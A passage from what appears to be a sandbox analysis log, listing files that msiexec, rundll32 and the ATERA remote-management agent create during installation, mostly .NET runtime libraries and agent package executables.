                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\NLog.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Process.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\ATERA Networks\AteraAgent\System.ValueTuple.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICBCF.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: 4c9995.rbf (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Thread.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.FileSystem.DriveInfo.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Drawing.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7187.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Serialization.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Csp.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.ThreadPool.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\hostpolicy.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.ReaderWriter.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Tasks.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIB4E8.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Pipes.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIB4E8.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.FileExtensions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Collections.Concurrent.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.Primitives.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.WebSockets.Client.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI64A0.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Formatters.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net6.0\System.Diagnostics.EventLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Atera.Agent.Package.Infrastructure.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Console.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.VisualBasic.Core.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ObjectModel.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.Diagnostics.EventLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Private.Uri.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Sockets.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Algorithms.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB4E8.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Claims.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Private.Xml.Linq.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: 4c9997.rbf (copy)Jump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Options.ConfigurationExtensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.CompilerServices.VisualC.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.ServiceProcess.ServiceController.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Serialization.Xml.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Serialization.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.Extensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Numerics.Vectors.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.TypeConverter.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.NameResolution.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Parallel.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.ValueTuple.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ServiceProcess.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileSystemGlobbing.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.EventLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Compression.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Abstractions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\dotnet.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Tasks.Dataflow.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Web.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Compression.Brotli.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.VisualBasic.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: 4c999b.rbf (copy)Jump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Http.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Overlapped.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Linq.Expressions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Buffers.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.DiaSymReader.Native.amd64.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Debug.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\ATERA Networks\AteraAgent\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIA259.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XDocument.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Http.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Core.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Hosting.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.Extensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Queryable.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Principal.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Ping.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.MemoryMappedFiles.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.Utils.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ServiceModel.Web.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Security.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI28DE.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIDDD3.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Contracts.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI9B15.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\x64\SQLite.Interop.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.RegularExpressions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.Encodings.Web.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileProviders.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Compression.ZipFile.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\it\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\WindowsBase.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.Exceptions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.NetworkInformation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Sinks.File.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Claims.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI9B15.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Thread.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.XmlSerializer.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Formats.Asn1.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Compression.FileSystem.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1CA.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI9B15.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Overlapped.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\CliWrap.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIB4E8.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Collections.NonGeneric.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.WebSockets.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Globalization.Extensions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\ucrtbase.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Transactions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.UnmanagedMemoryStream.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Binder.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.ThreadPool.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.IsolatedStorage.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\createdump.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6E49.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\msquic.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3FD.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.ServicePoint.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Handles.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Tracing.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XPath.XDocument.dllJump to dropped file
